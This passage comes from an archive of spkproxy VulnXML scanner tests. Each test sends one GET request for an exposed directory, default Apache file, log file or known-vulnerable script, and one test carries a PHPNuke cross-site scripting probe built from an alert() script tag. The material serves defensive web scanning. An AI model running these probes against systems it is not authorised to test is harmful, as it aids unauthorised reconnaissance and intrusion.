this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-482.xml0100664000076500007650000000743107566204543017567 0ustar davedave (SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator) "SiteScope service has no password set. Restrict by IP and set a password." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Event Log 200 Event Log 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-483.xml0100664000076500007650000000715107566204543017567 0ustar davedave (smssend.php) "PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /smssend.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-484.xml0100664000076500007650000000706207566204543017571 0ustar davedave (software/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /software/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-485.xml0100664000076500007650000000705607566204543017575 0ustar davedave (source/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /source/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-486.xml0100664000076500007650000000724607566204543017577 0ustar davedave (splashAdmin.php) "Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /splashAdmin.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-487.xml0100664000076500007650000000705007566204543017571 0ustar davedave (sql/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sql/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-488.xml0100664000076500007650000000705007566204543017572 0ustar davedave (src/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /src/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-489.xml0100664000076500007650000000703407566204543017575 0ustar davedave (srchadm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /srchadm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-48.xml0100664000076500007650000000725307566204543017507 0ustar davedave (index.html.pt) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.pt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-490.xml0100664000076500007650000000703207566204543017563 0ustar davedave (ss.cfg) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ss.cfg HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-491.xml0100664000076500007650000000705007566204543017564 0ustar davedave (ssi/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ssi/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-492.xml0100664000076500007650000000703207566204543017565 0ustar davedave (staff/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /staff/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-493.xml0100664000076500007650000000703507566204543017571 0ustar davedave (stat.htm) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stat.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-494.xml0100664000076500007650000000703007566204543017565 0ustar davedave (stat/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stat/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-495.xml0100664000076500007650000000704207566204543017571 0ustar davedave (statistic/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /statistic/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-496.xml0100664000076500007650000000704407566204543017574 0ustar davedave (statistics/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /statistics/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-497.xml0100664000076500007650000000703707566204543017577 0ustar davedave (stats.htm) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stats.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-498.xml0100664000076500007650000000704107566204543017573 0ustar davedave (stats.html) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stats.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-499.xml0100664000076500007650000000703707566204543017601 0ustar davedave (stats.txt) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stats.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-49.xml0100664000076500007650000000726107566204543017507 0ustar davedave (index.html.pt-br) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.pt-br HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-500.xml0100664000076500007650000000703207566204543017553 0ustar davedave (Stats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Stats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-501.xml0100664000076500007650000000703207566204543017554 0ustar davedave (stats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-502.xml0100664000076500007650000000703407566204543017557 0ustar davedave (status/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /status/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-503.xml0100664000076500007650000000703207566204543017556 0ustar davedave (store/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /store/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-504.xml0100664000076500007650000000703607566204543017563 0ustar davedave (StoreDB/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /StoreDB/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-505.xml0100664000076500007650000000707107566204543017563 0ustar davedave (style/) "May be able to view web styles directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /style/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-506.xml0100664000076500007650000000707307566204543017566 0ustar davedave (styles/) "May be able to view web styles directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /styles/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-507.xml0100664000076500007650000001007607566204543017564 0ustar davedave (submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview") "This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-508.xml0100664000076500007650000000707407566204543017571 0ustar davedave (super_stats/access_logs) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /super_stats/access_logs HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-509.xml0100664000076500007650000000703607566204543017570 0ustar davedave (support/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /support/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-50.xml0100664000076500007650000000727307566204543017502 0ustar davedave (index.html.ru.cp-1251) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ru.cp-1251 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-510.xml0100664000076500007650000000702607566204543017557 0ustar davedave (sys/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sys/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-511.xml0100664000076500007650000000703407566204543017557 0ustar davedave (system/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /system/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-512.xml0100664000076500007650000000703007566204543017554 0ustar davedave (temp/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /temp/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-513.xml0100664000076500007650000000714307566204543017562 0ustar davedave (template/) "This may be interesting as the directory may hold sensitive files or reveal system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /template/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-514.xml0100664000076500007650000000703007566204543017556 0ustar davedave (test/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-515.xml0100664000076500007650000000703607566204543017565 0ustar davedave (testing/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /testing/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-516.xml0100664000076500007650000000717307566204543017570 0ustar davedave (ticket.php?id=99999) "ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ticket.php?id=99999 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ expects first argument 200 expects first argument 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-517.xml0100664000076500007650000000702607566204543017566 0ustar davedave (tmp/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /tmp/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test 